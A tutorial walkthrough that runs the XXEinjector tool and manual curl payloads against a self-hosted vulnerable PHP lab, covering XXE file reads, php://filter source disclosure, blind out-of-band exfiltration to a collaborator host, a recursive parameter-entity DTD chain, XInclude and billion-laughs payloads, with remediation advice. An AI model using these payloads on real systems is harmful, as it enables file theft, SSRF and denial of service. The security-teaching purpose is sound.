This is the walkthrough I wish I had when I first reached for XXEinjector. We start from a fresh state, point the Ruby tool at a vulnerable XML endpoint, and walk every primitive the tool exposes: in-band file read, PHP filter source disclosure, blind out-of-band exfil, plus the manual XInclude and billion-laughs payloads that sit outside XXEinjector's wheelhouse but belong in the same article. Every step is reproducible against a small Docker lab I publish for this exact purpose.
If you have not read the XML External Entity deep dive yet, do that first; this article assumes the parser flags and the entity grammar are familiar. The XXEinjector cheat sheet is the flag-by-flag reference that complements this walkthrough, and the best XXE tools list for 2026 covers where XXEinjector sits relative to manual curl and the Burp extensions.
A note on the output you will see. Every example below was produced against techearl-labs/xml-external-entity/xxe-basic on the pinned PHP 8.2 + libxml 2.9.14 image. The endpoints, parser configuration, and failure modes are deterministic and will match what you get locally. A few outputs are environment-dependent and will differ in minor ways: the IP address the collaborator logs for the lab container (a Docker bridge address, e.g. 172.27.0.3), the exact /etc/passwd contents inside the PHP container (whatever the base image ships), XXEinjector's own log timestamps, and the path it writes the captured loot to under Logs/. Those are illustrative; the structure underneath is what to follow.
The lab target
Pull and run the lab:
git clone https://github.com/ishankaru/techearl-labs.git
cd techearl-labs
docker compose up xxe-basic
The target listens on http://localhost:8086. There are two endpoints, both backed by the same unsafe parser (LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_NOCDATA, plus an explicit $dom->xinclude() call):
| Endpoint | Method | Behaviour |
|---|---|---|
| /import.php | POST | Parses the XML body, echoes every <name> element back into the HTML response. In-band XXE, XInclude, and the billion-laughs mitigation all live here. |
| /upload-blind.php | POST | Same parser, response hard-wired to OK or Error. No content reflects back. This is the realistic shape of a backend XML processor. |
A second container, xxe-basic-collab, runs a tiny Python HTTP server on the Docker network. It has no published port (only the sibling lab container can reach it) and logs every incoming request line to stdout. Tail it in a second terminal before starting:
docker compose logs -f xxe-basic-collab
That log is the side channel for every blind exfil attempt in this article. If you do not see lines appear there, the attack did not fire.
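For orientation, a request logger of this kind fits in a few lines of Python's standard library. This is a sketch, not the lab's actual collaborator source (which is not reproduced in this article): the names `CollabHandler`, `make_collab_server`, and `SEEN` are invented for illustration, and the log format simply mirrors the `[collab] GET from ... path=...` lines that appear later in the walkthrough.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

SEEN = []  # hypothetical in-memory copy of every logged line


class CollabHandler(BaseHTTPRequestHandler):
    """Answer every GET with 200 and log who asked for what."""

    def do_GET(self):
        line = f"[collab] GET from {self.client_address[0]} path={self.path}"
        SEEN.append(line)
        print(line, flush=True)  # stdout is what `docker compose logs` tails
        body = b"ok\n"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args):
        # Silence the default stderr access log; do_GET prints its own line.
        pass


def make_collab_server(host="0.0.0.0", port=80):
    """Build (but do not start) the listener; call .serve_forever() to run it."""
    return HTTPServer((host, port), CollabHandler)
```

Calling `make_collab_server().serve_forever()` would run it in the foreground. The point of the sketch is only that the "side channel" is nothing more exotic than an access log.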
Step 1: install XXEinjector
XXEinjector is a single Ruby script. Either clone the repo or grab the file:
git clone https://github.com/enjoiz/XXEinjector.git
cd XXEinjector
ruby XXEinjector.rb --help
The tool needs a recent Ruby (2.7+ is fine, anything in the 3.x range works). If --help prints, you are done. No gems, no virtualenv.
Step 2: build the request template
XXEinjector works from a captured HTTP request with an XXEINJECT marker where it should splice each payload. Save the file as req.txt:
POST /import.php HTTP/1.1
Host: localhost:8086
Content-Type: application/xml
Content-Length: 0

XXEINJECT
Content-Length: 0 is fine; XXEinjector recalculates it for every request before sending. The marker has to be on its own line, in the body, exactly XXEINJECT. No surrounding XML scaffolding (the tool builds that for you).
For the blind endpoint you build a second template, identical apart from the path:
POST /upload-blind.php HTTP/1.1
Host: localhost:8086
Content-Type: application/xml
Content-Length: 0

XXEINJECT
Save that as req-blind.txt. Both files sit next to where you run the tool.
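If you would rather generate the two templates than hand-edit them, a short script does it. This is a convenience sketch; `build_template` and `write_templates` are hypothetical helper names, and the only thing taken from the article is the request shape itself (headers, an empty separator line, then the marker alone in the body).

```python
from pathlib import Path

MARKER = "XXEINJECT"  # the placeholder the article says XXEinjector looks for


def build_template(path, host="localhost:8086"):
    """Return a raw HTTP request whose body is just the injection marker."""
    headers = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/xml",
        "Content-Length: 0",  # placeholder; the article notes the tool recalculates it
    ]
    # An empty line separates the header block from the body.
    return "\n".join(headers) + "\n\n" + MARKER + "\n"


def write_templates(directory="."):
    """Write req.txt and req-blind.txt side by side; return the file names."""
    out = Path(directory)
    targets = {"req.txt": "/import.php", "req-blind.txt": "/upload-blind.php"}
    for name, path in targets.items():
        (out / name).write_text(build_template(path))
    return sorted(targets)
```

Run `write_templates()` from the XXEinjector checkout and both files land next to the script.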
Step 3: classic in-band file read
The in-band primitive is the one XXEinjector was originally written for: declare an external entity, reference it where the application echoes content back, and let the response do the exfil. The lab's /import.php is exactly that shape.
ruby XXEinjector.rb \
--host=127.0.0.1 \
--file=req.txt \
--path=/etc/passwd \
--direct=YES \
--verbose
What each flag does:
- --host=127.0.0.1 is the address of the attacker's listener. We are not using the listener for this scenario (this is in-band), but XXEinjector requires the flag.
- --file=req.txt is the request template from Step 2.
- --path=/etc/passwd is the file on the target's filesystem to read.
- --direct=YES tells the tool to use a direct entity reference (<!ENTITY xxe SYSTEM "file://...">) rather than the parameter-entity OOB chain (covered in Step 6, and broken on this libxml).
- --verbose prints the payload it sends and the response it gets, which is the only way to learn how the tool reasons.
Output (abbreviated):
[+] Sending request with malicious XML:
<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>
[+] Got response. Looking for file in response...
[+] File found:
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
[+] Saved to: Logs/127.0.0.1/_etc_passwd
XXEinjector finds the echoed bytes in the response body, slices them out, writes them to Logs/<host>/<sanitised-path>, and prints them inline when --verbose is on. The file is on your disk now.
A useful sanity check before troubleshooting: confirm the lab echoes <name> content by hand:
curl -s -X POST --data-binary @- \
-H 'Content-Type: application/xml' \
http://localhost:8086/import.php <<'XML'
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
<bookmarks>
<bookmark><name>&xxe;</name><url>http://x</url></bookmark>
</bookmarks>
XML
If the response contains the container's hostname inside a <strong>, the in-band primitive works and XXEinjector should succeed. If it does not, fix the manual case before re-running the tool.
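The same sanity check can be scripted when you want to repeat it across several paths. The sketch below only builds the payload and pulls echoed text out of a response body; it assumes the echo arrives inside a plain `<strong>` element, as described above, and the exact surrounding HTML is a guess. `inband_payload` and `extract_strong` are illustrative names, not part of any tool.

```python
import html
import re


def inband_payload(target_path):
    """Build the same document shape as the curl sanity check."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file://{target_path}">]>\n'
        "<bookmarks>\n"
        "<bookmark><name>&xxe;</name><url>http://x</url></bookmark>\n"
        "</bookmarks>\n"
    )


def extract_strong(response_html):
    """Return the text of every <strong> element, HTML-unescaped and trimmed."""
    found = re.findall(r"<strong[^>]*>(.*?)</strong>", response_html, flags=re.S)
    return [html.unescape(chunk).strip() for chunk in found]
```

POST the string returned by `inband_payload("/etc/hostname")` with whatever HTTP client you prefer and feed the response body to `extract_strong`. An empty list means the endpoint reflected nothing.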
Step 4: PHP filter source disclosure
file:// reads files as raw bytes and splices them into the document as entity replacement text. That is fine for plain-text files, but PHP source never reaches you intact. Nothing executes it (libxml reads the file straight off disk; the PHP engine is not involved), but the parser treats the <?php opener as markup, and any <, & or stray tag in the code either vanishes from the echoed text or makes the document ill-formed and aborts the parse. The classic trick is to wrap the path in php://filter/convert.base64-encode/, which routes the read through PHP's stream filter machinery and hands the parser a base64 string with no markup characters in it.
XXEinjector has a built-in shortcut for exactly this:
ruby XXEinjector.rb \
--host=127.0.0.1 \
--file=req.txt \
--path=/var/www/html/import.php \
--direct=YES \
--phpfilter \
--verbose
--phpfilter rewrites the entity URL from file:///var/www/html/import.php to php://filter/convert.base64-encode/resource=/var/www/html/import.php. The lab echoes the base64 blob back inside a <strong> tag, XXEinjector grabs it, decodes, and writes the actual PHP source.
Output (abbreviated):
[+] Sending request with malicious XML:
<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM
"php://filter/convert.base64-encode/resource=/var/www/html/import.php">]>
<foo>&xxe;</foo>
[+] Got response. Looking for file in response...
[+] Base64-decoded and saved to: Logs/127.0.0.1/_var_www_html_import.php
cat the file and you get the PHP source of the endpoint you just exploited. In a real engagement this is where you walk the codebase off the box looking for credentials, config files, second-order vulnerabilities, and any other entrypoints the same parser handles. The shortlist is application-specific; wp-config.php, .env, framework bootstrap files, anything in the application's config/ directory.
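When you drive this step by hand rather than through the tool, the two moving parts are the wrapped URL and the decode. A minimal sketch, with `php_filter_url` and `decode_blob` as hypothetical helper names; it assumes the blob you copy out of the response may have picked up line breaks or indentation from the HTML.

```python
import base64
import binascii


def php_filter_url(target_path):
    """Wrap a filesystem path in the base64-encoding stream filter."""
    return f"php://filter/convert.base64-encode/resource={target_path}"


def decode_blob(blob):
    """Decode an echoed base64 blob, tolerating whitespace picked up from HTML."""
    compact = "".join(blob.split())
    try:
        return base64.b64decode(compact, validate=True)
    except binascii.Error as exc:
        raise ValueError("response did not contain clean base64") from exc
```

A `ValueError` here usually means you copied surrounding markup along with the blob, or the endpoint truncated the echo.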
Step 5: blind out-of-band exfil with a direct external entity
/upload-blind.php returns OK either way, so the in-band approach above will never work there. The realistic primitive is to make libxml issue an outbound HTTP request when it resolves an entity, encode the bit you care about into the URL, and read it out of the collaborator log.
XXEinjector has a built-in HTTP listener (--oob=http) but the only port the lab container can reach is the collaborator's port 80 inside the Docker network. Easier to use what is already there:
ruby XXEinjector.rb \
--host=xxe-basic-collab \
--file=req-blind.txt \
--oob=http \
--direct=YES \
--path=/etc/hostname \
--verbose
--host=xxe-basic-collab tells XXEinjector to point the SYSTEM URL at the collaborator hostname (which the lab container resolves over the Docker bridge). --oob=http selects the HTTP OOB mode, --direct=YES keeps the entity declaration inline rather than chaining through an external DTD.
In practice, since we are not letting XXEinjector be its own listener, the cleanest demo is to drive the payload manually with curl and watch the collaborator log. XXEinjector's value here is that the same shape generalises across hosts:
curl -s -X POST --data-binary @- \
-H 'Content-Type: application/xml' \
http://localhost:8086/upload-blind.php <<'XML'
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY exfil SYSTEM "http://xxe-basic-collab/?leak=fired">
]>
<bookmarks>
<bookmark><name>&exfil;</name><url>http://x</url></bookmark>
</bookmarks>
XML
Response from the lab: OK. Response in the collaborator tail:
[collab] GET from 172.27.0.3 path=/?leak=fired
The OOB primitive fires. The endpoint reflected nothing, but the parser still made an outbound HTTP request when it resolved &exfil;, and the collaborator received it. Anything you can put into that query string (a static token, a per-victim id, a hostname) lands in the log.
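Once you start tagging requests with per-target tokens, reading the collaborator log by eye stops scaling. The sketch below builds the tagged payload and parses log lines back into their parts. It assumes the `[collab] METHOD from IP path=...` format shown above and tolerates any prefix in front of it; `exfil_payload` and `parse_collab_line` are illustrative names.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# Unanchored on purpose: log tailers may prepend their own prefix to each line.
LINE_RE = re.compile(r"\[collab\] (?P<method>\S+) from (?P<ip>\S+) path=(?P<path>\S+)")


def exfil_payload(collab_host, token):
    """Direct external entity whose URL carries a static token."""
    url = f"http://{collab_host}/?leak={quote(token, safe='')}"
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE foo [\n<!ENTITY exfil SYSTEM "{url}">\n]>\n'
        "<bookmarks>\n"
        "<bookmark><name>&exfil;</name><url>http://x</url></bookmark>\n"
        "</bookmarks>\n"
    )


def parse_collab_line(line):
    """Split one collaborator log line into method, source IP and query dict."""
    match = LINE_RE.search(line)
    if match is None:
        return None
    query = parse_qs(urlsplit(match["path"]).query)
    return {"method": match["method"], "ip": match["ip"], "query": query}
```

Percent-encoding the token keeps quotes and ampersands out of the SYSTEM literal, so a token never breaks the declaration it is embedded in.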
Step 6: why the textbook recursive-PE chain fails here
Every classic XXE write-up demonstrates blind file-content exfil with a recursive parameter-entity chain in an external DTD. XXEinjector implements exactly this pattern when you drop --direct=YES and let it host its own evil.dtd:
ruby XXEinjector.rb \
--host=xxe-basic-collab \
--file=req-blind.txt \
--oob=http \
--path=/etc/passwd \
--verbose
The payload XXEinjector builds is shaped like:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % remote SYSTEM "http://xxe-basic-collab/evil.dtd">
%remote;
]>
<foo>x</foo>
evil.dtd declares a parameter entity %file that reads /etc/passwd, an %eval that defines %exfil whose SYSTEM URL embeds %file; in the query string, then forces %exfil; to resolve so the file contents leave in the outbound URL.
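To make that description concrete, here is the generic textbook form of such a DTD, rendered by a small helper so the host and path are explicit. This is the widely published pattern, not a copy of the file XXEinjector serves (its exact contents may differ); `render_evil_dtd` and the `x` query parameter are illustrative choices.

```python
def render_evil_dtd(target_path, collab_host):
    """Render the three-stage parameter-entity DTD described above."""
    return (
        # Stage 1: read the target file into %file;
        f'<!ENTITY % file SYSTEM "file://{target_path}">\n'
        # Stage 2: %eval; declares %exfil;. The inner percent sign is written
        # as &#x25; so it only becomes a declaration once %eval; is expanded.
        '<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM '
        f"'http://{collab_host}/?x=%file;'>\">\n"
        # Stage 3: expand both so the outbound request is attempted.
        "%eval;\n"
        "%exfil;\n"
    )
```

Printing `render_evil_dtd("/etc/passwd", "xxe-basic-collab")` gives four lines: the two declarations followed by the `%eval;` and `%exfil;` references that trigger them.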
Against the lab's libxml 2.9.14 the chain does not fire end-to-end. What you will see in the collaborator log:
[collab] GET from 172.27.0.3 path=/evil.dtd
One line. The external DTD loads. The second-stage %exfil; GET that should carry the file contents never appears. libxml has tightened parameter-entity processing across the 2.9.x series and now refuses to define a new entity inside the expansion of another entity loaded from an external DTD, which is the exact mechanic the recursive-PE pattern depends on. This is current 2026 behaviour on a stock PHP 8.2 image, not a quirk of one Docker tag.
What that means for XXEinjector specifically:
- The OOB primitive in Step 5 still works. The parser does issue outbound requests for direct external entities.
- The recursive-PE file-content exfil that XXEinjector defaults to does not work against this parser version. You will see the initial DTD fetch and nothing else.
- The tool has no built-in fallback. It waits, decides nothing came back, and exits without loot.
This is not a bug in XXEinjector; it is libxml hardening eroding the technique the tool was designed around. On older parsers (anything before the 2.9.11-ish window where the PE restrictions tightened), and on differently-configured parsers (Java with XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES=true and no extra hardening, .NET pre-4.5.2, Python lxml with resolve_entities=True), the recursive-PE chain still works exactly the way XXEinjector expects. Test the chain manually against the target before assuming the tool is broken; if the initial DTD fetch hits your collaborator and nothing else does, you are looking at the same libxml ceiling. The blind XXE OOB techniques article walks the parser-by-parser matrix.
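That triage rule (DTD fetched, nothing after it) is simple enough to encode when you are testing many targets. A sketch, assuming you have already reduced the collaborator log to a list of request paths; `classify_chain` and its three labels are made up for this example.

```python
def classify_chain(paths, dtd_path="/evil.dtd"):
    """Classify one attempt from the request paths the collaborator saw."""
    def base(path):
        # Compare on the path without its query string.
        return path.split("?", 1)[0]

    dtd_hits = [p for p in paths if base(p) == dtd_path]
    other_hits = [p for p in paths if base(p) != dtd_path]
    if not dtd_hits:
        return "no-callback"   # the parser never fetched the external DTD
    if not other_hits:
        return "dtd-only"      # stage one fired, the exfil stage did not
    return "exfil-fired"       # a second-stage request arrived
```

Against the lab, the log from this step classifies as `dtd-only`, which is the signal to stop blaming the tool and fall back to the direct-entity primitive.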
Step 7: XInclude (no DOCTYPE, no entity declaration)
XInclude is a separate libxml feature, opt-in, and entirely independent of entity processing. The lab calls $dom->xinclude() on the parsed document, which expands <xi:include> nodes in place. XXEinjector does not generate XInclude payloads (it is an entity-focused tool), so this step is manual curl:
curl -s -X POST --data-binary @- \
-H 'Content-Type: application/xml' \
http://localhost:8086/import.php <<'XML'
<?xml version="1.0"?>
<bookmarks xmlns:xi="http://www.w3.org/2001/XInclude">
<bookmark>
<name><xi:include href="file:///etc/hostname" parse="text"/></name>
<url>http://x</url>
</bookmark>
</bookmarks>
XML
The response includes the container's hostname inside the <strong> of the bookmark. No DOCTYPE, no <!ENTITY> declaration. The XInclude path is often missed by audits that only grep for inline DTDs, and disabling external entities does not disable XInclude. The XInclude attacks article covers the other half of the surface (recursive includes, intra-document includes that surface authentication cookies, the difference between parse="xml" and parse="text").
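Since XXEinjector will not build this payload for you, a tiny generator saves retyping it per path. The sketch uses Python's `xml.etree.ElementTree` only to serialise the document (so the namespace declaration and attribute quoting are guaranteed well-formed); `xinclude_payload` is a hypothetical helper, and the element names are the ones from the curl example above.

```python
import xml.etree.ElementTree as ET

XI_NS = "http://www.w3.org/2001/XInclude"


def xinclude_payload(target_path):
    """Build the bookmark document with an <xi:include> and no DOCTYPE."""
    ET.register_namespace("xi", XI_NS)  # serialise with the usual xi: prefix
    root = ET.Element("bookmarks")
    bookmark = ET.SubElement(root, "bookmark")
    name = ET.SubElement(bookmark, "name")
    ET.SubElement(
        name,
        f"{{{XI_NS}}}include",
        {"href": f"file://{target_path}", "parse": "text"},
    )
    ET.SubElement(bookmark, "url").text = "http://x"
    return '<?xml version="1.0"?>\n' + ET.tostring(root, encoding="unicode")
```

Building the string locally does not process the include; nothing is read until the target's parser runs its own XInclude pass.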
Step 8: billion laughs (the default mitigation in action)
The classic entity-expansion DoS, included here to show what the default libxml configuration actually catches. POST the nested payload at /import.php:
curl -s -X POST --data-binary @- \
-H 'Content-Type: application/xml' \
http://localhost:8086/import.php <<'XML'
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
]>
<bookmarks>
<bookmark><name>&lol6;</name><url>http://x</url></bookmark>
</bookmarks>
XML
Response: XML parse error with a libxml diagnostic about the entity-expansion limit. Container CPU and memory stay flat. The lab demonstrates the attack and the default mitigation that already blocks it: libxml refuses to expand the document past its built-in limit. Passing LIBXML_PARSEHUGE to loadXML would disable that limit; the lab does not pass it, which is also why a real-world audit should grep for LIBXML_PARSEHUGE and LIBXML_NOENT together. The billion laughs attack article covers the variants (quadratic blowup, external-entity-based amplification) that get around expansion counters which only look at internal entity references.
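The arithmetic behind the payload is worth seeing once. Each level repeats the previous one ten times, so the six-level document above would expand to 3 × 10^5 = 300,000 characters from a few hundred bytes of input. The sketch below computes that and regenerates the DOCTYPE for other depths; `expanded_length` and `laughs_doctype` are illustrative helpers, not part of the lab.

```python
def expanded_length(levels=6, fanout=10, seed="lol"):
    """Characters produced when the top-level entity is fully expanded.

    Level 1 is the seed itself; every further level repeats the previous
    level `fanout` times, so the size grows as fanout ** (levels - 1).
    """
    return len(seed) * fanout ** (levels - 1)


def laughs_doctype(levels=6, fanout=10, seed="lol"):
    """Render the nested entity declarations used in the payload."""
    lines = [f'<!ENTITY lol "{seed}">']
    previous = "lol"
    for level in range(2, levels + 1):
        current = f"lol{level}"
        refs = f"&{previous};" * fanout  # e.g. "&lol;&lol;..." ten times
        lines.append(f'<!ENTITY {current} "{refs}">')
        previous = current
    return "<!DOCTYPE lolz [\n" + "\n".join(lines) + "\n]>"
```

`expanded_length()` returns 300000 for the lab payload; at ten levels the same formula gives 3,000,000,000, which is where the attack gets its name.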
Step 9: session and re-runs
XXEinjector writes everything it captures to Logs/<host>/. Re-running with the same --path overwrites the existing log entry; re-running with a different --path adds a new file. The tool has no session cache the way sqlmap does, so every run re-sends the full request, which is fine for XXE (a single round trip per file) but worth noting if you script bulk extraction across many paths.
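For bulk reads, XXEinjector's --brute=/path/to/wordlist flag loops over a list of file paths using the same payload shape. Useful when you have one entity primitive and you want to walk a known config-file list. The --enumports flag is a different kind of loop: it probes which outbound ports the target can reach, which matters when you are setting up an OOB channel rather than reading files.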
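If you prefer to keep each read as its own invocation (one log file per path, easy to retry individually), you can plan the runs from a wordlist. The sketch below only builds command lines, it does not execute anything; the flags are exactly the ones used in Step 3, and `xxeinjector_argv` and `plan_reads` are hypothetical helper names.

```python
import shlex


def xxeinjector_argv(target_path, template="req.txt", host="127.0.0.1"):
    """Argument vector for one in-band read, using the Step 3 flags."""
    return [
        "ruby", "XXEinjector.rb",
        f"--host={host}",
        f"--file={template}",
        f"--path={target_path}",
        "--direct=YES",
        "--verbose",
    ]


def plan_reads(wordlist_lines):
    """Turn wordlist lines into shell-quoted commands, skipping blanks and # comments."""
    commands = []
    for raw in wordlist_lines:
        path = raw.strip()
        if not path or path.startswith("#"):
            continue
        commands.append(shlex.join(xxeinjector_argv(path)))
    return commands
```

Pass the list from `xxeinjector_argv` straight to `subprocess.run` if you want to execute it; keeping it as a list avoids shell quoting problems with unusual paths.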
What I would do next on this target
In a real engagement after Step 5 the report writes itself:
- Confirm in-band XXE on /import.php, multiple file-read primitives available (file://, php://filter).
- Confirm PHP source disclosure via php://filter/convert.base64-encode/ on every file the application user can read.
- Confirm blind OOB on /upload-blind.php via direct external entity (SSRF primitive: outbound HTTP from the application container to anywhere libxml can reach).
- Confirm XInclude on /import.php as an alternative file-read path independent of entity hardening.
- Note that the textbook recursive-PE file-content exfil does not fire against this parser version (libxml 2.9.14), but the OOB primitive remains.
- Recommend: pass LIBXML_NONET (block network resolution) and never set LIBXML_NOENT, disable XInclude (do not call $dom->xinclude()), reject any XML body containing a DOCTYPE declaration at the application layer, run the XML processor with no outbound network access from its container.
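The "reject any body containing a DOCTYPE" recommendation is the easiest one to get subtly wrong with string matching (encodings, whitespace, comments). One way to do it with a real tokenizer is sketched below in Python for illustration; the lab itself is PHP, so treat this as the shape of the check rather than a drop-in fix. It leans on the standard library's expat binding, and `DoctypeRejected` and `assert_no_doctype` are names invented here. It does not address XInclude, which needs its own control.

```python
from xml.parsers import expat


class DoctypeRejected(ValueError):
    """Raised when an XML body carries a DOCTYPE declaration."""


def assert_no_doctype(body):
    """Tokenise `body` (bytes) and abort as soon as a DOCTYPE starts."""
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Raising here stops the parse before any entity is declared or used.
        raise DoctypeRejected(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    try:
        parser.Parse(body, True)
    except expat.ExpatError as exc:
        raise ValueError(f"malformed XML: {exc}") from exc
```

Run it as a gate in front of the real parser: a body that passes contains no DTD at all, so there are no entities (internal or external) left for the downstream parser to expand.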
The point of this walkthrough is the chain. Each primitive on its own looks small; the cumulative chain (file read, source disclosure, outbound SSRF, XInclude as the second-path file read) is what XXE means in practice for a real audit.
Where to go next
- The XXEinjector cheat sheet for the full flag reference.
- The XML External Entity deep dive for the parser-by-parser matrix and the defence playbook.
- The blind XXE OOB techniques for the parser-version differences that decide whether the recursive-PE chain fires.
- The XInclude attacks for the independent attack surface that hardening external entities does not close.
- The billion laughs attack for the entity-expansion DoS variants.
- The best XXE tools list for 2026 for where XXEinjector sits relative to manual curl, Burp's XXE extension, and the newer scanners.
Sources
Authoritative references this article was fact-checked against.
- XXEinjector, project README (github.com)
- libxml2 release notes (gitlab.gnome.org)
- PortSwigger Web Security Academy, XXE injection (portswigger.net)





